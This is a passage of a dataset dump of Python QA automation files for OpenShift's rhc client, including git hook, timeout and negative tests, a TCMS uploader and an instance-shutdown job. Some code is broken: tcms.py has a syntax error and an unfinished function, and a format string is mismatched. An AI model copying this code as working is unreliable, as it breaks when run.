% ( WORK_DIR, self.libra_server, self.user_email, self.user_passwd, self.domain_name ),\n expect_description = \"Ruby RHC client library script should be executed without any errors\",\n expect_return = 0\n ))\n\n case = testcase.TestCase(\"[US1841][BusinessIntegration][Mirage] Ruby rest common client library\", self.steps_list )\n case.add_clean_up(common.alter_domain, [self.domain_name])\n case.run()\n\t\n\tif case.testcase_status == 'PASSED':\n\t return self.passed(\"%s passed\" % self.__class__.__name__)\n\tif case.testcase_status == 'FAILED':\n\t return self.failed(\"%s failed\" % self.__class__.__name__)\n\t\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(RubyRestClient)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5675801038742065, "alphanum_fraction": 0.5780306458473206, "avg_line_length": 29.53191566467285, "blob_id": "d556fb95ba508f099465df05245763a63a82db75", "content_id": "62d228ae2230b0d13ecd6d23b1f545014116d04f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4306, "license_type": "no_license", "max_line_length": 104, "num_lines": 141, "path": "/automation/open/testmodules/RT/cartridge/custom_git_hook.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"\"\"\nJiangtao Zhao\[email protected]\nFeb 10, 2012\n[rhc-cartridge] Custom git post-receive hook\nhttps://tcms.engineering.redhat.com/case/122274/\n\"\"\"\nimport sys,os\nimport testcase,common\nimport rhtest\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"[rhc-cartridge] Custom git post-receive hook\"\n try:\n self.test_variant = self.config.test_variant\n except:\n self.info(\"Missing test_variant, used `php` as default\")\n self.test_variant = 'php'\n\n self.app_name = self.test_variant.split('-')[0] + common.getRandomString(7)\n self.git_repo = \"./%s\" % (self.app_name)\n self.app_type = common.app_types[self.test_variant]\n tcms_testcase_id=122274\n common.env_setup()\n common.clean_up(self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n\n self.steps_list = []\n\n def finalize(self):\n pass\n\nclass CustomGitHook(OpenShiftTest):\n def test_method(self):\n\n # 1. Create an app\n self.steps_list.append( testcase.TestCaseStep(\"1. Create an %s app\" % (self.test_variant),\n common.create_app,\n function_parameters=[self.app_name, self.app_type, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd],\n expect_description=\"the app should be created successfully\",\n expect_return=0))\n\n # 2.Custom git hook\n def add_build_hook():\n target_file_part = \"README.md\"\n hook_file_path = \"%s/.openshift/action_hooks/build\" % (self.app_name)\n try:\n f = open(hook_file_path,\"a\") #append ...\n f.write(\"\"\"\n#!/bin/bash\nfunction list_file(){\n command = \"ls -l $1\"\n echo \"Command: $command\"\n eval \"$command\"\n}\n\ntest_file=\"${OPENSHIFT_REPO_DIR}%s\"\nif [ -f $test_file ]; then\n list_file \"$test_file\"\nelse\n echo \"$test_file does not exist\"\n echo \"RESULT=1\"\n exit 1\nfi\n\nif [ ! -x $test_file ]; then\n echo \"$test_file does not have execute permission\"\n command=\"chmod +x $test_file\"\n echo \"Command: $command\"\n eval \"$command\"\n\n list_file \"$test_file\"\n\n if [ -x $test_file ]; then\n echo \"$test_file own execute permission now\"\n echo \"RESULT=0\"\n exit 0\n else\n \"$test_file still does not have execute permission\"\n echo \"RESULT=1\"\n exit 1\n fi\nelse\n echo \"$test_file already own execute permission!!!\"\n echo \"RESULT=1\"\n exit 1\nfi\"\"\" %(target_file_part))\n f.close()\n except:\n return 1\n\n return 0\n\n #cmd = \"echo '%s' >> %s\" % (testcode, hook_file_path)\n self.steps_list.append( testcase.TestCaseStep(\"2.Custom git hook\",\n add_build_hook,\n expect_description=\"git repo is modified successfully\",\n expect_return=0))\n self.steps_list.append( testcase.TestCaseStep(\"2.chomod +x for build\",\n \"chmod +x %s/.openshift/action_hooks/build\" % (self.app_name),\n expect_return=0))\n\n\n # 3.Git push all the changes and check the output\n self.steps_list.append( testcase.TestCaseStep(\"3.Git push all the changes and check the output\",\n \"cd %s && git add . && git commit -am t && git push\" % (self.git_repo),\n expect_description=\"Git push should succeed\",\n expect_return=0,\n expect_string_list=[\"RESULT=0\"]))\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CustomGitHook)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.49945029616355896, "alphanum_fraction": 0.5117009878158569, "avg_line_length": 49.93600082397461, "blob_id": "de1fc6f19579eaa5db2186fca7e81d23053f87c5", "content_id": "4d47c27c16b80ee402483e8b83832bbb1c90f702", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6367, "license_type": "no_license", "max_line_length": 147, "num_lines": 125, "path": "/automation/open/testmodules/RT/client/timeout_option_testing.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os\nimport common\nimport rhtest\nimport socket\nimport re\n\n# http://www.linuxfoundation.org/collaborate/workgroups/networking/netem\n# http://lartc.org/howto/lartc.qdisc.classful.html\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.app_type = common.app_types[\"php\"]\n self.app_name = common.getRandomString(10)\n common.env_setup()\n self.eth_device='eth0'\n self.info(\"Shaped device: %s\"%self.eth_device)\n self.timeout = 90 #seconds (should be greater then default)\n\n def finalize(self):\n self.reset_emulation()\n\n\nclass TimeoutOptionTesting(OpenShiftTest):\n def reset_emulation(self):\n try:\n self.debug(\"\\nCheck TC rules before action:\")\n common.command_get_status(\"sudo tc qdisc show dev %s\"%self.eth_device)\n self.debug(\"\\nRemoving TC rule...\")\n common.command_get_status(\"sudo tc qdisc del dev %s root\"%self.eth_device)\n self.debug(\"\\nCheck TC rules after action:\")\n common.command_get_status(\"sudo tc qdisc show dev %s\"%self.eth_device)\n self.debug(\"\\nDestroying app...\")\n common.destroy_app(self.app_name, self.user_email, self.user_passwd)\n os.system(\"rm -rf %s\"%self.app_name)\n except:\n pass\n\n def emulate_delay(self):\n if not re.search(r\"^\\d+\\.\\d+\\.\\d+\\.\\d+\",self.get_instance_ip()):\n ips = socket.gethostbyname_ex(self.get_instance_ip())[2]\n ip = [i for i in ips if i.split('.')[0] != '127'][0]\n else:\n ip = self.get_instance_ip()\n commands = [\n \"sudo tc qdisc add dev \"+self.eth_device+\" root handle 1: prio \",\n \"sudo tc qdisc add dev \"+self.eth_device+\" parent 1:3 handle 30: tbf rate 2kbit buffer 1600 limit 3000 \",\n \"sudo tc qdisc add dev \"+self.eth_device+\" parent 30:1 handle 31: netem delay 21s \", #should generate delay bigger than default (20s)\n #\"sudo tc qdisc add dev \"+self.eth_device+\" parent 30:1 handle 31: netem loss 99%% \",\n #\"sudo tc filter add dev \"+self.eth_device+\" protocol ip parent 1:0 prio 3 u32 match ip src %s/32 flowid 1:3\"%ip,\n \"sudo tc filter add dev \"+self.eth_device+\" protocol ip parent 1:0 prio 3 u32 match ip dst %s/32 flowid 1:3\"%ip]\n return common.command_get_status(\" && \\n\".join(commands))\n\n def test_method(self):\n self.add_step(\"Simulate bad network: Set network delay as 5s using tc (This script must be run as root)\",\n self.emulate_delay,\n #command=\"sudo tc qdisc add dev %s root netem delay 5s\"%self.eth_device,\n expect_return=0)\n\n self.add_step(\"DEBUG\", \"sudo tc qdisc show dev %s \"%self.eth_device)\n self.add_step(\"Try to create app without timeout option (default is 20s)\",\n \"rhc app create %s %s -l %s -p '%s' --no-git --insecure\" %(self.app_name, \n self.app_type, \n self.user_email, \n self.user_passwd),\n expect_description=\"Should get executation exprired response message. App can not be created\",\n expect_return=\"!0\",\n expect_str=[\"Timeout::Error\"],\n try_count=2)\n\n ''' it's very hard to simulate such condition to test both scenarious in delayed environment'''\n self.add_step(\"DEBUG\", \"sudo tc qdisc show dev %s \"%self.eth_device)\n self.add_step(\"Create the same app with timeout option %ds\"%self.timeout,\n \"rhc app create %s %s -l %s -p '%s' --no-git --timeout %d --insecure\" %(self.app_name, \n self.app_type, \n self.user_email, \n self.user_passwd, \n self.timeout),\n expect_description=\"App is created successfully\",\n try_count=2,\n expect_return=0)\n\n self.add_step(\"DEBUG\", \"sudo tc qdisc show dev %s \"%self.eth_device)\n self.add_step(\"Destroy the same app without timeout option (default is 10s)\",\n \"rhc app destroy %s -l %s -p '%s' --confirm --insecure\" %(self.app_name,\n self.user_email, \n self.user_passwd),\n expect_description=\"Should get executation exprired response message. App can not be destroyed\",\n expect_return=\"!0\",\n try_count=2,\n expect_str=[\"execution expired\"])\n\n self.add_step(\"DEBUG\", \"sudo tc qdisc show dev %s \"%self.eth_device)\n self.add_step(\"Destroy the same app with timeout option %d\"%self.timeout,\n \"rhc app destroy %s -l %s -p '%s' --confirm --timeout %d --insecure\" %(self.app_name, \n self.user_email, \n self.user_passwd, \n self.timeout),\n expect_description=\"App is destroyed successfully\",\n try_count=2,\n expect_return=0)\n\n self.info(\"[US1110][rhc-client] timeout option testing\")\n self.run_steps()\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(TimeoutOptionTesting)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5124030113220215, "alphanum_fraction": 0.5166009664535522, "avg_line_length": 50.717105865478516, "blob_id": "44747e519ceb44dd26b08064057f64765677957b", "content_id": "5f81ebc93e6cec5adcf39914842784177d761d3f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7861, "license_type": "no_license", "max_line_length": 201, "num_lines": 152, "path": "/automation/open/testmodules/RT/client/client_negative_testing.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nimport testcase, common, OSConf\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\n\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.user_email = os.environ[\"OPENSHIFT_user_email\"]\n self.user_passwd = os.environ[\"OPENSHIFT_user_passwd\"]\n self.domain_name = common.get_domain_name()\n self.app_name=\"testapp\"\n tcms_testcase_id=122313,122349\n common.env_setup()\n self.steps_list = []\n\n def finalize(self):\n pass\n\n\nclass ClientNegativeTesting(OpenShiftTest):\n def test_method(self):\n step = testcase.TestCaseStep(\"rhc domain create Negative Testing: Without namespace\",\n \"rhc domain create -l %s -p '%s' %s\" %(self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_string_list=[\"Missing required argument 'namespace'\"],\n expect_return=\"!0\",\n )\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"rhc domain update Negative Testing: Invalid namespace\",\n \"rhc domain update %s '$$%%##' -l %s -p %s %s\" % (self.domain_name, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_string_list=['Invalid namespace. Namespace must only contain alphanumeric characters'],\n expect_return=\"!0\",\n )\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Timeout Option Negative Testing: timeout value of string type\",\n \"rhc app create %s php-5.3 -l %s -p %s --timeout test %s --insecure\" %(self.app_name, self.user_email, self.user_passwd),\n expect_string_list=['invalid argument: --timeout test'],\n expect_return=\"!0\",\n )\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"rhc app create Negative Testing: Without app name\",\n \"rhc app create -l %s -p %s %s\" %(self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_string_list=['Missing required argument \\'name\\''],\n expect_return=\"!0\",\n )\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"rhc app create Negative Testing: Invalid app name\",\n \"rhc app create '$#@*###' php-5.3 -l %s -p %s %s\" %(self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_string_list=['Invalid name specified'],\n expect_return=\"!0\",\n )\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"rhc app create Negative Testing: Without app type\",\n \"rhc app create myapp -l %s -p '%s' %s\" %(self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_string_list=['Every application needs a web cartridge'],\n expect_return=\"!0\",\n )\n self.steps_list.append(step)\n\n\n if self.config.options.run_mode != 'DEV':\n step = testcase.TestCaseStep(\"rhc app create Negative Testing: Invalid app type\",\n \"rhc app create myapp php-test -l %s -p '%s' %s\" %(self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_string_list=['Invalid cartridge'],\n expect_return='!0'\n )\n self.steps_list.append(step)\n\n if self.config.options.run_mode != 'DEV':\n step = testcase.TestCaseStep(\"rhc app Negative Testing: non-existing application\",\n \"rhc app stop -a unexist -l %s -p %s %s\" %(self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return='!0',\n expect_string_list=['Application unexist does not exist']\n #An application named \\'unexist\\' does not exist']\n )\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"rhc app Negative Testing: Invalid command\",\n \"rhc app haeel %s -l %s -p %s %s\" %(self.app_name, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return='!0',\n expect_string_list=['Too many arguments passed in.'], # XXX need to update testcase once bug is fixed\n )\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"rhc app Negative Testing: Without application\",\n \"rhc app show --state -l %s -p %s %s\" %(self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return='!0',\n expect_string_list=['Missing required argument \\'app\\'.']\n )\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"rhc app Negative Testing: Without command\",\n \"rhc app -a %s -l %s -p %s %s\" %(self.app_name, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return='!0',\n expect_string_list=['invalid option: -a'],\n )\n self.steps_list.append(step)\n\n if self.config.options.run_mode != 'DEV':\n step = testcase.TestCaseStep(\"'rhc snapshot save' Negative Testing: Invalid application\",\n \"rhc snapshot save -a unexist -l %s -p '%s' %s\" %(self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return='!0',\n expect_string_list=['Application unexist does not exist']\n )\n self.steps_list.append(step)\n\n\n step = testcase.TestCaseStep(\"'rhc snapshot save' Negative Testing: Without app\",\n \"rhc snapshot save -l %s -p %s -a %s\" %(self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return='!0',\n expect_string_list=['missing argument: -a']\n )\n self.steps_list.append(step)\n# self.steps_list.append(laststep)\n\n case = testcase.TestCase(\"[rhc-client]negative testing of client command including invalid option and miss argument\\n[US1110][rhc-client]negative testing: give wrong value to --timeout option\",\n self.steps_list\n )\n case.run()\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(ClientNegativeTesting)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.555435061454773, "alphanum_fraction": 0.557603657245636, "avg_line_length": 35.16666793823242, "blob_id": "c375790e5c1954ea1d3daa6065ed99c9de105302", "content_id": "68535f6ad2e1730e8e362756cb42dc0a5ae72585", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3689, "license_type": "no_license", "max_line_length": 77, "num_lines": 102, "path": "/automation/tcms.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "import time\nfrom nitrate import NitrateKerbXmlrpc\n\n\ntcmsproduction = 'https://tcms.engineering.redhat.com'\ntcmstest = 'https://tcms-test.app.eng.nay.redhat.com'\n\ntcmsurl = tcmsproduction\ntcms_server = NitrateKerbXmlrpc(tcmsurl + '/xmlrpc/').server\n\ndef create_run(plan_id):\n 'create new test run in TCMS'\n # get summary\n create_time = time.strftime('%Y-%m-%d %X', time.localtime())\n product_name = tcms_server.TestPlan.get(plan_id)['product']\n run_summary = product_name + '_' + 'automation' + '_' + create_time\n # get mananger id\n run_manager = tcms_server.TestPlan.get(plan_id)['owner_id']\n # get product id\n run_product = tcms_server.TestPlan.get(plan_id)['product_id']\n # get product version id\n run_product_version = \\\n tcms_server.TestPlan.get(plan_id)['product_version_id']\n # get build id\n run_build = tcms_server.Build.create(\n {'product': 243, 'name': create_time})['build_id']\n # get plan id\n run_plan_id = plan_id\n # get cases id list\n cases = tcms_server.TestCase.filter(\\\n {'plan__plan_id': plan_id, 'case_status__name': 'CONFIRMED'})\n cases_id = [case['case_id'] for case in cases]\n run_case = cases_id\n # create test run\n run_values = {\n 'summary': run_summary,\n 'manager': run_manager,\n 'product': run_product,\n 'product_version': run_product_version,\n 'build': run_build,\n 'plan': run_plan_id,\n 'case': run_case\n }\n try:\n run_id = tcms_server.TestRun.create(run_values)['run_id']\n except Exception, error_info:\n print 'Maybe y have no permission for the run creating,\\\n or maybe your run_values have sth wrong. \\\n detail error info is as follows, \\n %s' % error_info\n return run_id\n\n\ndef get_caserun_id(run_id, case_id)\n \"\"\"\n get case-run-id via run-id and case-id.\n \"\"\"\n\n return caserunid\n\ndef update_caserunstatus(run_id, tcms_results):\n 'update the result of automation in TCMS test-run'\n # get caserun id\n\n\n\n\n plan_id = tcms_server.TestRun.get(run_id)['plan_id']\n allcases = tcms_server.TestPlan.get(plan_id)['case']\n for result in tcms_results:\n caserun_result = result['case_status']\n if caserun_result == 'pass':\n caserun_status = 2\n elif caserun_result == 'fail':\n caserun_status = 3\n elif caserun_status == 'error':\n caserun_status = 7\n case_name = result['case_name']\n if case_name.startswith('ID'):\n case_id = int(case_name.split('_')[1])\n else:\n print 'case: %s whose name is not startswith \"ID\"!' % case_name\n continue\n if case_id in allcases:\n try:\n caserun_id = tcms_server.TestCaseRun.filter(\\\n {'run__run_id': run_id, \\\n 'case__case_id': case_id})[0]['case_run_id']\n except Exception, filter_error:\n print 'case: %d can not find in new run.' % case_id\n print 'detail error info is as follows, \\n %s' % filter_error\n continue\n else:\n try:\n tcms_server.TestCaseRun.update(\\\n caserun_id, {'case_run_status': caserun_status})\n except Exception, update_error:\n print 'caserun status updating failed!'\n print 'detail info is as follows, \\n %s' % update_error\n continue\n else:\n continue\n print 'Test result writeback finished!'\n" }, { "alpha_fraction": 0.5652030110359192, "alphanum_fraction": 0.5723742246627808, "avg_line_length": 39.10619354248047, "blob_id": "5c42be0cbe67f7e2e0a9c959abc23d9a9dfbc988", "content_id": "9b0e071b4ddabec2e8aa01e9e3ac7d3b62ae6583", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9064, "license_type": "no_license", "max_line_length": 181, "num_lines": 226, "path": "/automation/open/bin/posttestingjob.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os\nimport sys\nimport commands\nimport subprocess\nimport re\nimport yaml\nimport random\nimport string\nimport fcntl\nimport pymongo\nfrom urllib import quote, unquote\nfrom pymongo.errors import *\nfrom bson.objectid import ObjectId\n\nSCRIPT_PATH = os.path.abspath(os.path.dirname(__file__))\n\nclass DotDict(object):\n\n def __getattr__(self, name):\n return self.data[name]\n\n def __setattr__(self, name, value):\n if not self.__dict__.has_key('data'):\n self.__dict__['data'] = {}\n self.__dict__['data'][name] = value\n\n\nclass DefaultValueDict(dict):\n DEFAULT = {'instance_count' : 1, 'job_count' : 2}\n\n def __getitem__(self, key):\n if not self.has_key(key):\n return DefaultValueDict.DEFAULT\n else:\n return super(DefaultValueDict, self).__getitem__(key)\n\n\nclass PostTestingJob(object):\n KEY_PATH = os.path.join(SCRIPT_PATH, '..', 'etc', 'libra.pem')\n IP_ADDR = '184.73.182.48'\n TESTPLAN_ID = '4962'\n\n def __init__(self):\n # Change key file permission\n os.system(\"chmod 600 %s\" % (PostTestingJob.KEY_PATH))\n # Setup environment variables\n os.environ['RHTEST_HOME'] = os.path.abspath(os.curdir)\n os.environ['PATH'] = os.path.expandvars(os.path.expanduser('${RHTEST_HOME}/bin:${RHTEST_HOME}/lib:${RHTEST_HOME}/lib/supports:${RHTEST_HOME}/testmodules:$PATH'))\n os.environ['PYTHONPATH'] = os.path.expandvars(os.path.expanduser('${RHTEST_HOME}/bin:${RHTEST_HOME}/lib:${RHTEST_HOME}/lib/supports:${RHTEST_HOME}/testmodules:$PYTHONPATH'))\n # Init kerberos\n cmd = 'cd bin/ && ./kinit.sh'\n if os.system(cmd) != 0:\n print 'Failed to init kerberos. Please check your TCMS_USER and TCMS_PASSWORD'\n sys.exit(255)\n # Init parameters\n self.init_params()\n if not self.preprocess():\n sys.exit(255)\n # Connect to local mongodb\n mongo_url = os.environ['MONGO_CONN_URL']\n try:\n self.conn = pymongo.Connection('mongodb://%s' % (mongo_url))\n except ConnectionFailure:\n print 'Error: Failed to connect to MongoDB at %s:%s. Please check your system configurations.' % (mongo_url)\n sys.exit(255)\n self.db = self.conn['devenv']\n # Remove inactive instances\n self.check_existing_instances()\n\n def __del__(self):\n # Disconnect from MongoDB\n if hasattr(self, 'conn'):\n self.conn.close()\n\n def init_params(self):\n self.config = DotDict()\n self.param_list = ['INSTANCE_TAG', 'INSTANCE_IP', 'BUILD_UUID', 'SHUTDOWN_INSTANCE', 'TCMS_USER', 'TCMS_PASSWORD']\n for param in self.param_list:\n setattr(self.config, param.lower(), os.environ.get(param))\n\n def strip_params(self):\n for parameter in self.param_list:\n value = getattr(self.config, parameter.lower())\n if value != None:\n value = value.strip()\n if value != '':\n setattr(self.config, parameter.lower(), value)\n else:\n setattr(self.config, parameter.lower(), None)\n return True\n\n def preprocess(self):\n if not self.strip_params():\n print 'Failed to strip parameters'\n return False\n if self.config.shutdown_instance == 'false':\n return True\n elif self.config.shutdown_instance == 'true':\n if self.config.instance_ip and self.config.instance_tag and self.config.build_uuid:\n return True\n else:\n print 'INSTANCE_IP, INSTANCE_TAG and BUILD_UUID are needed to shutdown instance'\n return False\n else:\n print 'SHUTDOWN_INSTANCE can only be one of true/false'\n return False\n\n def remove_instance(self, tag, ip):\n cursor = self.db.instances.find({'tag':tag, 'ip':ip})\n if cursor.count() <= 0:\n print 'Instance %s(%s) is not in MongoDB' % (tag, ip)\n return False\n elif cursor.count() > 1:\n print 'Error: Multiple instances with the same tag and ip found. Please debug.'\n return False\n instance = cursor[0]\n if instance['user_count'] > 0:\n print 'Instance %s(%s) is still being used by %d builds: %s' % (tag, ip, instance['user_count'], instance['users'])\n print 'No need to shutdown it'\n return True\n elif instance['user_count'] < 0:\n print 'Error: The user_count of instance is less than 0. Something wrong happened.'\n return False\n # Shutdown instance\n print 'Going to shutdown instance: %s(%s)' % (tag, ip)\n ret = 1\n for i in range(3):\n ret = self.shutdown_instance_by_ip(ip)\n if ret == 0:\n break\n if tag != ip and ret != 0:\n for i in range(3):\n ret = self.shutdown_instance_by_tag(tag)\n if ret == 0:\n break\n if ret != 0:\n print 'Failed to shutdown instance %s(%s)' % (tag, ip)\n return False\n # Remove instance from MongoDB\n try:\n self.db.instances.remove({'tag' : tag, 'ip' : ip, 'user_count' : 0}, safe=True)\n except OperationFailure, e:\n print 'Error: Failed to remove instance from mongodb\\n', e\n return False\n return True\n\n def disuse_instance(self, build_uuid, tag, ip, value=-1):\n cursor = self.db.instances.find({'tag':tag, 'ip':ip, 'users':build_uuid})\n if cursor.count() == 1:\n instance = cursor[0]\n if build_uuid not in instance['users']:\n print 'instance %s(%s) is not being used by user: %s' % (tag, ip, build_uuid)\n return True\n self.db.instances.update({'_id':ObjectId(instance['_id'])}, {'$inc' : {'user_count' : value}})\n self.db.instances.update({'_id':ObjectId(instance['_id'])}, {'$pull' : {'users' : build_uuid}})\n return True\n elif cursor.count() <= 0:\n print 'Error: No such instance found: %s(%s)' % (tag, ip)\n return False\n else:\n print 'Error: Multiple instances found: %s(%s). Please check.' % (tag, ip)\n return False\n\n def shutdown_instance_by_tag(self, tag):\n if tag in ['int.openshift.redhat.com', 'stg.openshift.redhat.com']:\n print \"We can't shutdown stage or int instance\"\n return 0\n cmd = \"python bin/shutdown_instance.py -n '%s'\" % (tag)\n return subprocess.call(cmd, shell=True)\n\n def shutdown_instance_by_ip(self, ip, timeout=10):\n if ip in ['int.openshift.redhat.com', 'stg.openshift.redhat.com']:\n print \"We can't shutdown stage or int instance\"\n return 0\n cmd = \"ssh -t -t -i %s -o StrictHostKeyChecking=no -o ConnectTimeout=%d -t root@%s \\\"shutdown -h now\\\"\" % (PostTestingJob.KEY_PATH, timeout, ip)\n return subprocess.call(cmd, shell=True)\n\n def check_instance(self, ip, retry=2, timeout=20):\n cmd = \"ssh -t -t -i %s -o StrictHostKeyChecking=no -o ConnectTimeout=%d root@%s \\\"ls\\\"\" % (PostTestingJob.KEY_PATH, timeout, ip)\n for i in range(retry):\n (ret, output) = commands.getstatusoutput(cmd)\n if ret == 0:\n return True\n return False\n\n def check_existing_instances(self, retry=2, timeout=20):\n cursor = self.db.instances.find()\n for instance in cursor:\n print 'Checking instance: %s' % (instance['ip'])\n if instance['ip'] in (\"int.openshift.redhat.com\", \"stg.openshift.redhat.com\"):\n print 'No need to check stage or INT server'\n elif self.check_instance(instance['ip'], retry=2, timeout=20):\n print 'Instance %s is Active' % (instance['ip'])\n else:\n print 'Failed to ssh connect instance: %s. Remove it from MongoDB.' % (instance['ip'])\n try:\n self.db.instances.remove(instance['_id'], safe=True)\n except OperationFailure, e:\n print 'Warning: failed to remove inactive instance %s(%s) from MongoDB.\\n%s' % (instance['tag'], instance['ip'], e)\n\n def start(self):\n if self.config.shutdown_instance == 'true':\n if not self.disuse_instance(self.config.build_uuid, self.config.instance_tag, self.config.instance_ip):\n sys.exit(1)\n if not self.remove_instance(self.config.instance_tag, self.config.instance_ip):\n sys.exit(2)\n sys.exit(0)\n\n\nclass UnitTest(PostTestingJob):\n def __init__(self):\n super(UnitTest, self).__init__()\n\n def shutdown_instance_by_tag(self, tag):\n print 'Instance(tag: %s) has been shutdown' % (tag)\n return 0\n\n def shutdown_instance_by_ip(self, ip):\n print 'Instance(ip: %s) has been shutdown' % (ip)\n return 0\n\n\nif __name__ == '__main__':\n job = PostTestingJob()\n job.start()\n" }, { "alpha_fraction": 0.6684824824333191, "alphanum_fraction": 0.675680935382843, "avg_line_length": 25.479381561279297, "blob_id": "4e0123cd5edef3e4e750f90f8aa769584378ef43", "content_id": "fff33c862fe5a7e1c108ece59572a7ace1c52edb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5140, "license_type": "no_license", "max_line_length": 83, "num_lines": 194, "path": "/automation/open/lib/supports/XML/xmltools.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python -i\n\n\"\"\"\nSome convenience classes and functions for dealing with XML files.\n\n\"\"\"\n\nimport sys\nfrom xml.dom import minidom\n\nclass XMLDocument(object):\n\t\"\"\"\nXMLDocument(docname)\nA wrapper class for the xml.minidom.Document. This delegates to that\nclass, and also adds functionality more convenient for automation\npurposes.\n\t\"\"\"\n\tdef __init__(self, filename=None):\n\t\tif filename is not None:\n\t\t\tself.get_document(filename)\n\t\telse:\n\t\t\tself.document = None\n\t\t\tself.filename = None\n\t\tself.dirty = 0\n\t\tself.xmldict = None # cache the xml dictionary if we use it once\n\t\n\tdef set_dirty(self, val=1):\n\t\tself.dirty = val\n\n\tdef get_document(self, filename):\n\t\tself.document = minidom.parse(filename)\n\t\tself.filename = filename\n\t\tself.dirty = 0\n\t\treturn self.document\n\n\tdef write_xmlfile(self, filename=None):\n\t\tif filename is None:\n\t\t\tfilename = self.filename\n\t\tfo = open(filename, \"w\")\n\t\tself.document.writexml(fo)\n\t\tfo.close()\n\t\tself.dirty = 0\n\n#\tdef __del__(self):\n#\t\tif self.filename and self.dirty:\n#\t\t\tself.write_xmlfile()\n\n\tread = get_document\n\twrite = write_xmlfile\n\n\tdef writexml(self, writer):\n\t\tself.document.writexml(writer)\n\n\t# dictionaries have a more convenient access to nodes. \n\tdef get_xml_dict(self):\n\t\tif self.xmldict:\n\t\t\treturn self.xmldict\n\t\t# else\n\t\txmldict = {}\n\t\t_get_dict_helper(self.document.childNodes[0], \n\t\t\t\tnode2string(self.document.childNodes[0]), xmldict)\n\t\tself.xmldict = xmldict\n\t\treturn xmldict\n\n\tdef get_path(self, node, choplevel=0):\n\t\treturn node2path(node, choplevel)\n\n\tdef get_node(self, path):\n\t\t\"\"\"\nget_node(path)\nFind a particular node, given a pathname. \n\n\t\t\"\"\"\n\t\txmldict = 